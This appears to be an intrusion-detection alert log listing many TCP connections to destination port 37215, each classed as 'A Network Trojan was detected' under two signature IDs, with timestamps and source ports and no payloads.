          Timestamp:06/09/24-16:33:22.079376
          SID:2829579
          Source Port:34886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076973
          SID:2829579
          Source Port:59766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300980
          SID:2829579
          Source Port:54812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417673
          SID:2835222
          Source Port:60384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890795
          SID:2835222
          Source Port:46422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985432
          SID:2835222
          Source Port:50188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895741
          SID:2835222
          Source Port:46742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860558
          SID:2829579
          Source Port:52634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951055
          SID:2829579
          Source Port:51448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075501
          SID:2829579
          Source Port:51812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538221
          SID:2829579
          Source Port:59680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169378
          SID:2835222
          Source Port:47604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081729
          SID:2835222
          Source Port:54942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418292
          SID:2835222
          Source Port:46808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472081
          SID:2829579
          Source Port:33472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716555
          SID:2835222
          Source Port:57090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073714
          SID:2835222
          Source Port:48884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571457
          SID:2835222
          Source Port:34278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208224
          SID:2835222
          Source Port:53852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916462
          SID:2829579
          Source Port:57316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205216
          SID:2829579
          Source Port:60398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073827
          SID:2829579
          Source Port:52090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643217
          SID:2835222
          Source Port:34936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539560
          SID:2829579
          Source Port:52092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947456
          SID:2829579
          Source Port:48698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721047
          SID:2829579
          Source Port:43854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717964
          SID:2835222
          Source Port:59606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230725
          SID:2829579
          Source Port:45764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559661
          SID:2835222
          Source Port:45584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241815
          SID:2829579
          Source Port:48332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719156
          SID:2829579
          Source Port:60642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134393
          SID:2829579
          Source Port:37028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271826
          SID:2835222
          Source Port:53470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718035
          SID:2835222
          Source Port:41112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285046
          SID:2835222
          Source Port:37264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593973
          SID:2835222
          Source Port:51908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721582
          SID:2835222
          Source Port:57848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302579
          SID:2829579
          Source Port:51124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947375
          SID:2835222
          Source Port:56308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599418
          SID:2829579
          Source Port:33910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029321
          SID:2829579
          Source Port:52282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300833
          SID:2835222
          Source Port:38836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272871
          SID:2829579
          Source Port:60542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397691
          SID:2835222
          Source Port:59582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077710
          SID:2835222
          Source Port:42912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081989
          SID:2829579
          Source Port:43402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557653
          SID:2829579
          Source Port:39210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227490
          SID:2829579
          Source Port:58882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.295374
          SID:2829579
          Source Port:34384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910563
          SID:2835222
          Source Port:41916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289827
          SID:2835222
          Source Port:53800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028754
          SID:2835222
          Source Port:58252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397581
          SID:2835222
          Source Port:49242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915016
          SID:2829579
          Source Port:45210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892478
          SID:2829579
          Source Port:36618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645953
          SID:2829579
          Source Port:46924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206235
          SID:2835222
          Source Port:57240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867867
          SID:2829579
          Source Port:50160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282376
          SID:2829579
          Source Port:43062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418205
          SID:2835222
          Source Port:44492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131888
          SID:2829579
          Source Port:37082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396831
          SID:2835222
          Source Port:45960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161055
          SID:2829579
          Source Port:36682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952069
          SID:2829579
          Source Port:45730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286770
          SID:2829579
          Source Port:41552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288962
          SID:2835222
          Source Port:34736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989972
          SID:2829579
          Source Port:33458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081712
          SID:2829579
          Source Port:52860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417489
          SID:2829579
          Source Port:54354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714814
          SID:2829579
          Source Port:37936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920982
          SID:2829579
          Source Port:60062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357475
          SID:2829579
          Source Port:51226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287947
          SID:2829579
          Source Port:54900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223657
          SID:2835222
          Source Port:41890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682202
          SID:2829579
          Source Port:44208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928507
          SID:2835222
          Source Port:47202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035701
          SID:2835222
          Source Port:48168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993716
          SID:2835222
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567668
          SID:2829579
          Source Port:42784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862654
          SID:2835222
          Source Port:45546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477343
          SID:2829579
          Source Port:41992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290577
          SID:2829579
          Source Port:53668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465419
          SID:2835222
          Source Port:57616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820271
          SID:2829579
          Source Port:53460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312696
          SID:2835222
          Source Port:37242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994347
          SID:2829579
          Source Port:43162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398208
          SID:2835222
          Source Port:58240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929054
          SID:2829579
          Source Port:60940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597978
          SID:2835222
          Source Port:60240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102987
          SID:2835222
          Source Port:38284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223017
          SID:2835222
          Source Port:36310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028214
          SID:2835222
          Source Port:39576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869842
          SID:2835222
          Source Port:44206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224312
          SID:2829579
          Source Port:57676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104441
          SID:2829579
          Source Port:37848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289171
          SID:2835222
          Source Port:40624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566417
          SID:2829579
          Source Port:58152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721393
          SID:2829579
          Source Port:53690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029618
          SID:2835222
          Source Port:36792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030701
          SID:2835222
          Source Port:37594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823690
          SID:2835222
          Source Port:42972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411646
          SID:2829579
          Source Port:47678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986427
          SID:2835222
          Source Port:55892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931611
          SID:2835222
          Source Port:53956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908887
          SID:2835222
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017988
          SID:2835222
          Source Port:43520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823444
          SID:2829579
          Source Port:59044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302732
          SID:2835222
          Source Port:50506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286001
          SID:2835222
          Source Port:35372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033224
          SID:2835222
          Source Port:36006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928391
          SID:2829579
          Source Port:35148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082835
          SID:2835222
          Source Port:39810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034031
          SID:2835222
          Source Port:46072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412272
          SID:2829579
          Source Port:48010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291228
          SID:2835222
          Source Port:51662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085359
          SID:2829579
          Source Port:44626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067272
          SID:2829579
          Source Port:52726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930017
          SID:2829579
          Source Port:45204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.155835
          SID:2835222
          Source Port:52204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033206
          SID:2829579
          Source Port:43966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915031
          SID:2829579
          Source Port:54250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296976
          SID:2835222
          Source Port:37192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538743
          SID:2835222
          Source Port:42560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946179
          SID:2829579
          Source Port:53358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928910
          SID:2829579
          Source Port:60652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029410
          SID:2829579
          Source Port:53358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474743
          SID:2829579
          Source Port:55732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306359
          SID:2829579
          Source Port:35012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720752
          SID:2835222
          Source Port:41578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418249
          SID:2829579
          Source Port:57372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541608
          SID:2835222
          Source Port:39110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599377
          SID:2835222
          Source Port:35412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398363
          SID:2829579
          Source Port:57746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076277
          SID:2829579
          Source Port:39410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.099675
          SID:2829579
          Source Port:38672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419451
          SID:2835222
          Source Port:59690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399093
          SID:2835222
          Source Port:48880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205651
          SID:2829579
          Source Port:47756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417553
          SID:2829579
          Source Port:50604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102662
          SID:2835222
          Source Port:56496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926764
          SID:2829579
          Source Port:57082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.952606
          SID:2829579
          Source Port:44950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035780
          SID:2835222
          Source Port:37960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291420
          SID:2835222
          Source Port:34174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223062
          SID:2835222
          Source Port:41694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468690
          SID:2835222
          Source Port:39118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571323
          SID:2835222
          Source Port:57980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034345
          SID:2829579
          Source Port:44678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415368
          SID:2829579
          Source Port:33678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993633
          SID:2829579
          Source Port:54992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820626
          SID:2835222
          Source Port:46292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103319
          SID:2835222
          Source Port:47966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822672
          SID:2829579
          Source Port:45192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993635
          SID:2835222
          Source Port:44216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157107
          SID:2829579
          Source Port:46834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244766
          SID:2835222
          Source Port:34560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944681
          SID:2829579
          Source Port:41458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718266
          SID:2829579
          Source Port:47234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905975
          SID:2835222
          Source Port:49468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539623
          SID:2829579
          Source Port:54354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302272
          SID:2835222
          Source Port:52940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478100
          SID:2835222
          Source Port:58018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915792
          SID:2829579
          Source Port:56610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074364
          SID:2835222
          Source Port:48892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120879
          SID:2835222
          Source Port:49060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395923
          SID:2835222
          Source Port:44482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287893
          SID:2835222
          Source Port:42082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944621
          SID:2835222
          Source Port:41916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541474
          SID:2835222
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558669
          SID:2829579
          Source Port:56560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163801
          SID:2835222
          Source Port:50350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294381
          SID:2835222
          Source Port:57628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396515
          SID:2835222
          Source Port:41876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399284
          SID:2829579
          Source Port:51630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248885
          SID:2829579
          Source Port:60916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226428
          SID:2835222
          Source Port:48104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895938
          SID:2829579
          Source Port:34322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165478
          SID:2829579
          Source Port:35538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718774
          SID:2829579
          Source Port:58846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080959
          SID:2829579
          Source Port:42642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713532
          SID:2829579
          Source Port:54122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281038
          SID:2829579
          Source Port:37892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075429
          SID:2829579
          Source Port:44362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036075
          SID:2829579
          Source Port:51638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476848
          SID:2829579
          Source Port:57264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285479
          SID:2835222
          Source Port:48418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993687
          SID:2835222
          Source Port:50832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916704
          SID:2829579
          Source Port:52930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923657
          SID:2835222
          Source Port:33810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987451
          SID:2835222
          Source Port:33774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592834
          SID:2835222
          Source Port:48300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230622
          SID:2829579
          Source Port:41420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167449
          SID:2829579
          Source Port:51214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169307
          SID:2835222
          Source Port:45062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600338
          SID:2829579
          Source Port:44096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284665
          SID:2835222
          Source Port:58536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396720
          SID:2829579
          Source Port:46752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162431
